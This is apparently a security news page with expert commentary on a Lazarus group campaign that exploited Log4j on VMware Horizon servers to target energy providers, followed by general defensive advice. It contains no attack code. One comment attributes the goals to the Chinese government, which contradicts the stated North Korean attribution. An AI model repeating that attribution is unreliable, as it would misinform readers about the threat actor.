Researchers have uncovered a new campaign targeting U.S., Canadian and Japanese energy providers to the North Korean Lazarus APT hacking group. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers which was used to gain an initial foothold into targeted organizations https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Information Security Buzz (aka ISBuzz News) is an independent resource that provides the experts comments, analysis and opinion on the latest Information Security news and topics
This attack illustrates some of the serious issues with U.S. and global critical infrastructure and the need to step up our game in these areas. The Log4j exploit used in these attacks has been known, and called critical, for over a year. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet. In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, it seems there are still systems that have not been patched yet. This poses a huge threat to some of the most critical systems within the critical infrastructure space.
While it appears that the intrusions are currently seeking intellectual property that the Chinese government can use themselves or perhaps use to produce cheap copies of equipment, it would not take much to weaponize the access and potentially cripple many power and energy sites across the country.
Organizations that still use software susceptible to Log4j vulnerabilities should immediately remove direct internet access from the devices until the vulnerabilities are mitigated.
In every country, critical Infrastructure entities such as energy companies are specifically and regularly targeted by nation-state backed hacking groups. Many of these groups can have significant capabilities and resources. The targeted nature of their campaigns also means they can take target specific approaches by analyzing the individual behaviors and operations at their objective organization. Most general cybercrime is opportunistic in nature, using simple and cheap means such as mass phishing campaigns and automated password guessing bots to cast a wide net to potential victims. That the non-targeted approach is so regularly successful should give us pause when assessing the risk of a hyper targeted attack from highly skilled adversaries with both ample budget and a specific mission.
The good news, if there is any, is that it’s still possible to mitigate risk by investing in the fundamentals of cybersecurity, beginning with a strong cultural approach. The essential elements of protection through segmentation, attack surface reduction, and system hardening make it more difficult for threat actors to operate and spread if they get a foothold. Careful monitoring controls that include threat hunting and rapid alerting of suspicious behavior to an experienced team can help quickly identify and neutralize attackers that manage to bypass prevention controls. Regular security validations such as penetration testing can help identify vulnerabilities from omissions or misconfigurations before attackers can exploit them in the first place. The problem is that it’s easy enough to say and understand the factors that contribute to cybersecurity resiliency, but implementation is challenging, especially in organizations with competing priorities and limited resources. To be successful, leaders must own the reality of cybersecurity threats and dedicate both the human and monetary resources to protecting their organizations.